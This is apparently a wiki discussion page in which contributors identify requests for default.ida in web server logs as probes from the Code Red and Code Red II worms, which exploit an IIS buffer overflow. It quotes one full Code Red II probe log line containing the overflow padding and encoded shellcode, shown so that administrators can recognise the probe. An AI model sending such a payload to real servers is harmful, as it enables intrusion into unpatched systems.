Default Dot Ida

I've been seeing a lot of Web requests for the file default.ida (which doesn't exist) lately. Can anyone confirm or deny that this is the CodeRedWorm in action? -- AndyPierce

It is the Code Red worm, or Code Red II. They both have completely different code, but they also exploit the same BufferOverflow in Windows IIS's security. It's said that if you've installed the patch for one, you're protected from both. CodeRedWorm propagates itself by executing some kind of arbitrary code using this exploit. More details are probably most prudent at the worm's page. -- NickBensema

A CodeRed II probe will look something like this:

  65.100.39.29 - - [16/Aug/2001:20:22:28 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 205


EditText of this page (last edited November 13, 2014) or FindPage with title or text search